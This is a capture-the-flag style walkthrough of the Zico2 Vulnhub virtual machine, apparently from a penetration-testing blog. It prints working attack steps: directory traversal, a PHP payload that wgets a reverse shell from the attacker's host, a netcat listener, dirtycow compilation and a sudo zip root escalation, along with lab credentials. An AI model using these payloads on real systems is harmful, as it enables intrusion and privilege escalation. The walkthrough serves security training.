Zico2

Vulnhub virtual machine; One of the last of my vulnhub boxes from the OSCP prep list. Zico2, used enumeration to find an admin login, which used basic credentials to enter. Used the backend to use php to download a reverse shell which led to privesc with dirtycow and zip.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Search for VM on network

1
netdiscover -r 192.168.56.0/24

Target: 192.168.56.122

Enumeration

Nmap Scan:

1
nmap -sV -sC -oA nmap/zico2.nmap 192.168.56.122

Interesting Ports: 80 - webserver 111 - unknown at this point 22 - ssh (front door)

Investigate port 80

checking out source:

nothing of immediate interest.

navigating around site page is based off a php backend which could be of use in the future for a reverse php shell.

Test for directory traversal with an escape

1
http://192.168.56.122/view.php?page=../../../../../../etc/passwd

now we have an idea of users. Saved the passwd locally to folder and parsed for just user that have the ability to use sh.

1
cat passwd | grep /bin/.*sh > sh.userlist

at the end just appened the users to sh.userlist

Gobuster

1
gobuster -u 192.168.56.122 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e

/dbadmin/ accessible:

we found a web application name and version number along with a password field. testing generic passwords

1
2
3
password
zico
admin

Password: Admin # Lets take a second and talk about how this is a terrible password.

“were in!”

Investgate the /usr/databases/test_users click the info button

looks like MD5 hashes - decrypted with https://www.md5online.org/md5-decrypt.html

1
2
root: 34kroot34
zico: zico2215@

quick attempt to SSH using credentials — No-Go

searchsploit

1
searchsploit phpliteadmin

mirror 24044.txt

1
searchploit -m exploits/php/webapps/24044.txt

Looks like we can create a new database and move to upload a reverse shell.

created a database name execwashere.php

create table named gimmeshell with Number of Fields: 1

used test for the name, selected TEXT and inserted the default value <?php phphinfo(); ?>

navigated to location of execwashere.php

1
http://192.168.56.122/view.php?page=../../../usr/databases/execwashere.php

Lets go input a reverse php shell since we know we can access /usr/databases by creating a new database named test.php

1
<?php system("cd /usr/databases/; wget http://192.168.56.102:8000/phpshell.php"); ?>

launch our reverse shell via phpshell.php

Setup Listener

1
nc -lvnp 9000

dirtycow

uname inspect

This version is dirtycow susceptible.

download the dirty.c exploit from https://www.exploit-db.com/exploits/40839 setup up webserver and wget from box

1
wget http://192.168.56.102:8000/dirty.c

Compile

1
gcc -pthread dirty.c -o dirty -lcrypt


Priv-Esc

navigate /home/zico/ discovered wordpress and wp-config.php

we now found credentials for zico

1
zico:sWfCsfJSPV9H3AmQzw8

attempt SSH with credentials:

check permissions:

1
sudo -l

Root&Loot

Taking advantage of zip to elevate to root

1
sudo zip /tmp/test.zip /home/zico/wordpress -T --unzip-command="sh -c /bin/bash"

connect to dirtycow’d SSH

“Bring me the root” -exec